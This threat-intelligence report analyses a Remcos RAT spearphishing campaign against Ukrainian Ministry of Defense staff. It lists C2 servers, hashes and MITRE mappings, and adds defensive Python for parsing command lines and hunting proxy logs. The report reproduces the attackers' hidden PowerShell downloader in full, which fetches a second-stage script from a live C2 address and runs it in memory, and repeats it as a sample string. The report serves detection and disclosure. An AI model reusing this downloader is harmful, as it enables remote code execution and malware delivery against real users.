Operation MAYNA HARVEST: Remcos RAT Targets Ukrainian Ministry of Defense via Geo-Fenced PowerShell Chain

title: "Operation MAYNA HARVEST: Russian-Aligned Campaign Deploys Remcos RAT Against Ukrainian Ministry of Defense Through Geo-Fenced PowerShell Downloaders"
subtitle: "Three C2 servers across three countries, six LNK files with identical PowerShell templates, and a RIPE WHOIS record that exposes the hosting operator -- a 3-week campaign targeting Ukrainian military property management personnel"
tags: ["Remcos", "Ukraine", "UAC-0184", "APT", "LNK", "PowerShell", "geo-fencing", "spearphishing", "Russia"]
The filenames tell the story. "Nakaz_MO_perevirka_mayna" -- Ministry of Defense Order, property check. "Spysok_mayna" -- property list. "Vtrata mayna PETROVSKYI" -- property loss by Petrovskyi. "Dopovid_maino" -- property report. Every lure document references Ukrainian military asset management procedures, and every one of them is a weaponized LNK file that downloads Remcos RAT through a geo-fenced PowerShell chain.
This campaign has been active since at least February 19, 2026. We have mapped three distinct C2 servers across three countries (Netherlands, Czech Republic, United Kingdom), six malicious LNK files, and five unique PowerShell payload URLs. The C2 servers return HTTP 403 to non-Ukrainian IP addresses -- payload delivery is restricted to the target country.
The infrastructure traces to bulletproof hosting networks including DGTLS-MNT, with a RIPE WHOIS record that exposes "Nikita Sibul" in Belgrade, Serbia, as the admin contact for one of the C2 hosting providers.
Key Findings
- 3 C2 servers rotating on ~2-week intervals, all running Apache on Ubuntu
- 6 malicious LNK files with identical PowerShell downloader templates
- Geo-fencing active: Non-Ukrainian IPs receive HTTP 403 Forbidden on all C2 servers
- Remcos RAT confirmed as final payload via ThreatFox (C2: 46[.]28[.]70[.]102:1654)
- Campaign active since February 19, 2026 with infrastructure rotation across waves
- UAC-0184 attribution (HIGH confidence) based on tradecraft overlap with CERT-UA advisories
- OPSEC failure: RIPE WHOIS exposes Nikita Sibul (Belgrade, Serbia) as admin contact for Kraken Network ISP (AS209274)
- Bulletproof hosting: DGTLS-MNT (known BPH), InterLIR-brokered IP space, shell company registered in the UK
The Attack Chain
A victim in a Ukrainian MoD office receives an email with a ZIP archive. Inside are two LNK files using the double-extension trick: .docx.lnk appears as .docx with Windows default settings. When clicked:
```powershell
# LNK command line as recovered from the samples: PowerShell runs with a hidden
# window, fetches the .ps1 stage through a WinHttp COM object, executes the
# response text in memory, and then Word is launched as a decoy.
powershell.exe -w Hidden
$r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'
$r.Open('GET', 'http://80.71.224.185/kakrarg/sneakerassembly.ps1', $false)
$r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell')   # campaign-specific user-agent
$r.Send()
. ([ScriptBlock]::Create($r.ResponseText))                   # dot-source stage 2 without writing it to disk
# Decoy launched so the "document" appears to open normally:
C:\Program Files\Microsoft Office\root\Office16\WINWORD.exe
```
The PowerShell runs hidden, downloads the second stage via the WinHttp COM object rather than Invoke-WebRequest (so no cmdlet invocation lands in PowerShell module logging), executes it in memory via [ScriptBlock]::Create without writing a file, and opens Microsoft Word as a decoy so the user believes their "document" opened normally. The COM trick only sidesteps module logging: where Script Block Logging (Event ID 4104) is enabled, the content passed to ScriptBlock::Create is still recorded at execution, which makes that log the most reliable place to recover stage 2.
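As an added triage helper (not part of the original report and not campaign tooling), the following Python parses a process-creation command line of the shape shown above, names which features of the template it carries, and flags double-extension LNK filenames. The sample command line is constructed by joining the page's listing with `;` and invoking the decoy with `&`, which is an assumption about how the LNK packs the arguments; the URL, user-agent, COM object and decoy path are the ones printed on the page.

```python
import re

# Constructed sample: the page's LNK argument listing joined into one line,
# the way it appears in a process-creation event (Sysmon 1 / Windows 4688).
# Joining with ';' and launching the decoy with '&' are assumptions; the URL,
# user-agent, COM object and decoy path are the ones printed on the page.
SAMPLE_CMDLINE = (
    "powershell.exe -w Hidden "
    "$r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'; "
    "$r.Open('GET', 'http://80.71.224.185/kakrarg/sneakerassembly.ps1', $false); "
    "$r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell'); "
    "$r.Send(); "
    ". ([ScriptBlock]::Create($r.ResponseText)); "
    "& 'C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.exe'"
)

CAMPAIGN_UA = "UA WindowsPowerShell"           # from the Behavioral IOCs
DOC_EXTS = (".docx", ".doc", ".pdf", ".xlsx")  # document extensions seen before ".lnk"

RE_HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
RE_COM = re.compile(r"New-Object\s+-ComObject\s+['\"]([^'\"]+)['\"]", re.I)
RE_OPEN = re.compile(r"\.Open\(\s*['\"](\w+)['\"]\s*,\s*['\"]([^'\"]+)['\"]", re.I)
RE_UA = re.compile(
    r"SetRequestHeader\(\s*['\"]User-Agent['\"]\s*,\s*['\"]([^'\"]+)['\"]", re.I)
RE_SCRIPTBLOCK = re.compile(r"\[ScriptBlock\]::Create", re.I)
RE_DECOY = re.compile(r"([A-Za-z]:\\[^'\"\r\n]*?\.exe)", re.I)


def parse_downloader(cmdline: str) -> dict:
    """Pull the template's moving parts out of one PowerShell command line."""
    com = RE_COM.search(cmdline)
    opened = RE_OPEN.search(cmdline)
    ua = RE_UA.search(cmdline)
    decoy = RE_DECOY.search(cmdline)
    return {
        "hidden": bool(RE_HIDDEN.search(cmdline)),
        "com_object": com.group(1) if com else None,
        "method": opened.group(1).upper() if opened else None,
        "url": opened.group(2) if opened else None,
        "user_agent": ua.group(1) if ua else None,
        "scriptblock_create": bool(RE_SCRIPTBLOCK.search(cmdline)),
        "decoy": decoy.group(1) if decoy else None,
    }


def template_indicators(parsed: dict) -> list:
    """Name each feature of the MAYNA HARVEST template present in the parse."""
    hits = []
    if parsed["hidden"]:
        hits.append("hidden window (-w Hidden)")
    if (parsed["com_object"] or "").lower().startswith("winhttp.winhttprequest"):
        hits.append("WinHttp COM download (sidesteps cmdlet module logging)")
    if parsed["user_agent"] == CAMPAIGN_UA:
        hits.append("campaign user-agent")
    if parsed["scriptblock_create"]:
        hits.append("in-memory ScriptBlock::Create execution")
    if parsed["url"] and parsed["url"].lower().endswith(".ps1"):
        hits.append("remote .ps1 second stage")
    if parsed["decoy"] and parsed["decoy"].lower().endswith("winword.exe"):
        hits.append("WINWORD.exe decoy")
    return hits


def is_double_extension_lnk(filename: str) -> bool:
    """True for names like 'Nakaz_MO_perevirka_mayna.docx.lnk'."""
    name = filename.lower()
    if not name.endswith(".lnk"):
        return False
    stem = name[:-len(".lnk")]
    return stem.endswith(DOC_EXTS)


if __name__ == "__main__":
    parsed = parse_downloader(SAMPLE_CMDLINE)
    for key, value in parsed.items():
        print(f"{key:>19}: {value}")
    print("template indicators:", template_indicators(parsed))
    for name in ("Nakaz_MO_perevirka_mayna.docx.lnk",
                 "Dopovid_maino_09.01.pdf.lnk", "Spysok_mayna.docx"):
        print(f"{name}: double-extension LNK = {is_double_extension_lnk(name)}")
```

Feed `parse_downloader` the CommandLine field of Sysmon Event ID 1 or Windows 4688 (with command-line auditing on); a record that scores four or more of the six indicators is a near-certain template hit, and the extracted URL and user-agent can be pivoted straight into proxy logs.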
Campaign Waves
| Wave | Date | ZIP/LNK | C2 | URL Path |
|---|---|---|---|---|
| Wave 1 | Feb 19 | Vtrata mayna PETROVSKYI.zip | 195[.]10[.]205[.]65 | /kkraag/ |
| Wave 2 | Mar 5 | Dopovid_maino_09.01.pdf.lnk | 46[.]28[.]70[.]102 | /sp11rt4m/ |
| Wave 3 | Mar 10 | Nakaz_MO_perevirka_mayna.zip | 80[.]71[.]224[.]185 | /kakrarg/ |
The PS1 filenames follow a pattern: two random English words concatenated (sneakerassembly, buckwheatsociology, golfproceedings, tactilelivestock, puppetsafeguard, slappicnic). This strongly suggests an automated builder tool.
Infrastructure
| IP | Provider | Country | Role | Status |
|---|---|---|---|---|
| 80[.]71[.]224[.]185 | Kraken Network ISP (AS209274) | UK | PS1 staging (Wave 3) | LIVE (403) |
| 195[.]10[.]205[.]65 | Partner Hosting / ALTAWK | Netherlands | PS1 staging (Wave 1) | LIVE |
| 46[.]28[.]70[.]102 | ITLDC / GreenFloid | Czech Republic | PS1 staging + Remcos C2 (port 1654) | LIVE |
Kraken Network ISP (AS209274) is a shell company: UK registration, Serbian operator (Nikita Sibul, Belgrade), ASN created May 2025, IP block allocated December 2025. The adjacent /24 hosts a full mail server on .178 (possible phishing relay), RDP on .187, and Express/Node.js apps -- a functioning BPH block.
Partner Hosting references DGTLS-MNT in RIPE records -- a maintainer associated with bulletproof hosting operations.
IOCs
C2 Servers:
80[.]71[.]224[.]185 # Kraken Network ISP, UK (Wave 3)
195[.]10[.]205[.]65 # Partner Hosting, NL (Wave 1)
46[.]28[.]70[.]102 # ITLDC/GreenFloid, CZ (Waves 2 + Remcos C2)
46[.]28[.]70[.]102:1654 # Remcos RAT C2
Payload URLs:
hxxp://80[.]71[.]224[.]185/kakrarg/sneakerassembly.ps1
hxxp://80[.]71[.]224[.]185/kakrarg/buckwheatsociology.ps1
hxxp://195[.]10[.]205[.]65/kkraag/golfproceedings.ps1
hxxp://195[.]10[.]205[.]65/kkraag/tactilelivestock.ps1
hxxp://46[.]28[.]70[.]102/sp11rt4m/puppetsafeguard.ps1
File Hashes:
| SHA256 | File |
|---|---|
| a21094a7fd28bdb11165a341441dc223aa1c4fc02b3c87f7cbd22dfa6dc43b43 | Nakaz_MO_perevirka_mayna.zip |
| ec7f0d5da376591878b9bcd908e06e7d0e90176ecd99e41577167e29e47d40e4 | Nakaz_MO_perevirka_mayna.docx.lnk |
| 5c39fda25f7a93c3ad69628e939b5e62968a86c6f10b3792f2fadae2235cc9ac | Spysok_mayna.docx.lnk |
| 14cfadb8c0154dc1174b0b9af74765f769fad524d17eb2ec494ce02c9a221c8d | Dopovid_maino_09.01.pdf.lnk |
Behavioral:
- Custom User-Agent: UA WindowsPowerShell
- COM Object: WinHttp.WinHttpRequest.5.1
- Decoy Process: WINWORD.exe
MITRE ATT&CK
| Technique | ID | Application |
|---|---|---|
| Spearphishing Attachment | T1566.001 | ZIP with weaponized LNK files |
| PowerShell | T1059.001 | Hidden PowerShell downloader |
| Double File Extension | T1036.007 | .docx.lnk appears as .docx |
| Hidden Window | T1564.003 | PowerShell -w Hidden |
| Non-Standard Port | T1571 | Remcos C2 on port 1654 |
| Ingress Tool Transfer | T1105 | PowerShell downloads second stage |
| Query Registry | T1012 | Country code verification |
Conclusion
Three weeks, three C2 servers, three countries, one persistent objective: intelligence collection against Ukrainian Ministry of Defense personnel responsible for military property management. The tradecraft is consistent with UAC-0184 -- LNK delivery, PowerShell downloader chains, Remcos RAT, military-themed lures, geo-fenced C2 infrastructure. The operator's use of bulletproof hosting (DGTLS-MNT, InterLIR-brokered Kraken ISP) and infrastructure rotation shows operational discipline, but the identical PowerShell template and reused lure filenames provide reliable detection anchors. Block the three C2 IPs, hunt for the UA WindowsPowerShell user-agent string in proxy logs, and enable "Show file extensions" on every managed endpoint -- that single Group Policy change makes the double-extension trick visible to every user.
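To turn the Behavioral IOCs and the hunting advice above into a repeatable check, here is an added Python hunt over proxy records (example code, not part of the original report). The log schema is a constructed minimal tab-separated layout, not any vendor's native format; the C2 addresses, staging paths and user-agent are the page's IOCs, and the internal and third-party addresses are documentation ranges. It also handles the geo-fence case the report describes: a 403 from a known C2 still means the downloader ran on the requesting host.

```python
import ipaddress

# Indicators from the report's IOC section.
C2_IPS = {"80.71.224.185", "195.10.205.65", "46.28.70.102"}
CAMPAIGN_UA = "UA WindowsPowerShell"
STAGING_PATHS = ("/kakrarg/", "/kkraag/", "/sp11rt4m/")

# Constructed proxy log: tab-separated, columns in FIELDS order. This is a
# made-up minimal schema; map your proxy/Zeek/Suricata HTTP fields onto it.
# Rows 1 and 3 go to the page's C2s; the other destinations are documentation
# addresses standing in for benign traffic.
FIELDS = ("ts", "src_ip", "dst_ip", "dst_port", "method", "host", "uri", "user_agent", "status")
SAMPLE_LOG = "\n".join([
    "2026-03-10T08:14:02Z\t10.20.5.17\t80.71.224.185\t80\tGET\t80.71.224.185\t/kakrarg/sneakerassembly.ps1\tUA WindowsPowerShell\t200",
    "2026-03-10T08:15:40Z\t10.20.5.33\t198.51.100.7\t443\tGET\tintranet.example\t/\tMozilla/5.0\t200",
    "2026-03-11T11:02:17Z\t10.20.7.4\t195.10.205.65\t80\tGET\t195.10.205.65\t/kkraag/golfproceedings.ps1\tUA WindowsPowerShell\t403",
    "2026-03-11T11:30:00Z\t10.20.7.9\t203.0.113.8\t443\tGET\tupdates.example\t/agent/patch.ps1\tMozilla/5.0\t200",
])


def _is_ip(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def classify(rec: dict) -> list:
    """Return the reasons a single HTTP record is suspicious (empty if none)."""
    reasons = []
    if rec["dst_ip"] in C2_IPS:
        reasons.append("known MAYNA HARVEST C2 IP")
    if rec["user_agent"] == CAMPAIGN_UA:
        reasons.append("campaign user-agent")
    if any(rec["uri"].startswith(p) for p in STAGING_PATHS):
        reasons.append("known staging path")
    # Generic anchor that survives infrastructure rotation: a .ps1 pulled
    # from a bare IP rather than a hostname.
    if rec["uri"].lower().endswith(".ps1") and _is_ip(rec["host"]):
        reasons.append(".ps1 fetched from a bare IP")
    return reasons


def hunt(log_text: str) -> list:
    """Scan a whole log and return one finding per suspicious record."""
    findings = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = dict(zip(FIELDS, raw.split("\t")))
        reasons = classify(rec)
        if not reasons:
            continue
        finding = {"ts": rec["ts"], "src_ip": rec["src_ip"], "dst_ip": rec["dst_ip"],
                   "status": rec["status"], "reasons": reasons, "note": ""}
        # A 403 from a known C2 is not a clean miss: the geo-fence refused our
        # egress IP, but the LNK still executed on the host that sent the request.
        if rec["status"] == "403" and rec["dst_ip"] in C2_IPS:
            finding["note"] = "geo-fence 403: downloader ran, stage 2 not delivered; triage host anyway"
        findings.append(finding)
    return findings


def hosts_to_isolate(findings: list) -> list:
    """Distinct internal sources that need containment, sorted for the ticket."""
    return sorted({f["src_ip"] for f in findings})


if __name__ == "__main__":
    results = hunt(SAMPLE_LOG)
    for f in results:
        print(f["ts"], f["src_ip"], "->", f["dst_ip"], f["status"],
              "|", "; ".join(f["reasons"]), "|", f["note"])
    print("isolate:", hosts_to_isolate(results))
```

The bare-IP `.ps1` rule is the one worth keeping after the listed IPs rotate out; the user-agent and staging-path matches are exact and cheap but will lapse with the next builder template change.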